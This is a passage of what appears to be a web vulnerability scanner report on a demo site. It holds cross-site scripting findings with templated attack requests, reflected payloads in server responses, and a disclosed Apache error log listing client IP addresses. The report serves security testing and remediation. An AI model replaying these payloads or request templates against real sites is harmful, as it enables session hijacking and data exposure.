</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack>>"><script>alert('XSS')</script></attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /W3SVC1/ex001102.log HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:55 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:18 GMT
ETag: "d828b92aadc11:8f6"
Content-Length: 19
LOGIC CHECK SUCCESSIIS Server Log Disclosure (ex001102.log)
An IIS Log file was found.GET /W3SVC1/<attack>ex001102.log</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |401GET /W3SVC6/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:12 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (/W3SVC6/)IIS Log file directory found.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /errors/errors.log HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:24 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT
ETag: "1ebfab1aadc11:8f6"
Content-Length: 8277
<TITLE>LSWEB General Access Error Log</TITLE>Today is: 02-21-2001.<br>You are connecting from 65.80.48.114<br>Using Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<p>You can use the following to debug your CGI scripts<BR>Reload to update<HR><PRE>[Wed Feb 21 11:10:53 2001] [notice] child pid 20073 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:11:39 2001] [error] [client 62.104.210.91] File does not exist: /www/htdocs/depts/soc/robots.txt
[Wed Feb 21 11:11:56 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif
[Wed Feb 21 11:12:03 2001] [notice] child pid 20084 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:12:05 2001] [info] [client 209.244.133.207] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:12:08 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 7 idle, and 33 total children
[Wed Feb 21 11:12:09 2001] [notice] child pid 20094 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:12:10 2001] [notice] child pid 20096 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:12:24 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif
[Wed Feb 21 11:12:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:12:47 2001] [info] [client 165.91.173.150] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:13:04 2001] [error] [client 207.107.50.207] File does not exist: /www/htdocs/depts/anth/robots.txt
[Wed Feb 21 11:13:11 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 5 idle, and 33 total children
[Wed Feb 21 11:13:13 2001] [error] [client 208.219.77.29] File does not exist: /www/htdocs/depts/ger/robots.txt
[Wed Feb 21 11:13:13 2001] [notice] child pid 20115 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:13:18 2001] [info] [client 204.19.14.93] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:14:17 2001] [info] [client 209.146.77.133] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:14:26 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:14:36 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:14:48 2001] [info] [client 128.111.225.51] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:16:15 2001] [error] [client 195.93.66.164] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi
[Wed Feb 21 11:16:26 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/acker/acker.html
[Wed Feb 21 11:16:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:16:28 2001] [info] [client 216.125.117.6] send mmap timed out
[Wed Feb 21 11:16:33 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:16:34 2001] [error] [client 63.211.243.14] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:16:36 2001] [info] [client 129.252.222.2] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:16:37 2001] [error] [client 128.111.96.187] File does not exist: /www/htdocs/depts/soc/projects/ct3/spacer1.gif
[Wed Feb 21 11:16:48 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:16:49 2001] [notice] child pid 20154 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:16:58 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:17:14 2001] [info] [client 128.111.165.82] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:17:36 2001] [info] [client 130.160.7.76] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:17:41 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:17:43 2001] [notice] child pid 20158 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:18:11 2001] [error] [client 160.39.194.62] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi
[Wed Feb 21 11:18:18 2001] [error] [client 160.39.194.62] Premature end of script headers: /usr/local/web/wwwthreads//postlist.pl
[Wed Feb 21 11:18:33 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:18:42 2001] [error] [client 165.138.105.253] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html
[Wed Feb 21 11:19:04 2001] [error] [client 209.202.148.35] File does not exist: /www/htdocs/depts/writ/robots.txt
[Wed Feb 21 11:19:08 2001] [error] [client 216.35.103.75] File does not exist: /www/htdocs/depts/artst/~tvc/v09/interviews/v09int.ser_ulm.html
[Wed Feb 21 11:19:24 2001] [notice] child pid 20278 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:19:27 2001] [notice] child pid 20282 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:19:28 2001] [info] [client 195.205.28.2] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:19:34 2001] [notice] child pid 20284 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:24 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/t1/wwwboard/faq.html
[Wed Feb 21 11:21:25 2001] [notice] child pid 20397 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:26 2001] [notice] child pid 20399 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:27 2001] [notice] child pid 20400 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:28 2001] [info] [client 151.188.89.64] (32)Broken pipe: client stopped connection before send body completed
[Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:23:28 2001] [notice] child pid 20422 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:23:37 2001] [error] [client 65.5.146.93] File does not exist: /www/htdocs/depts/writ/faculty/johnston/courses/writ2/w01
[Wed Feb 21 11:23:54 2001] [error] [client 200.15.34.155] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:24:53 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2
[Wed Feb 21 11:25:02 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2
[Wed Feb 21 11:25:09 2001] [error] [client 216.208.71.130] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html
</PRE>
Error Log Information DisclosureAn errors.log file was found.GET /errors/<attack>errors.log</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"'><img%20src="javascript:alert('XSS')">&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=>"'><img%20src="javascript:alert('XSS')">&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:36 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
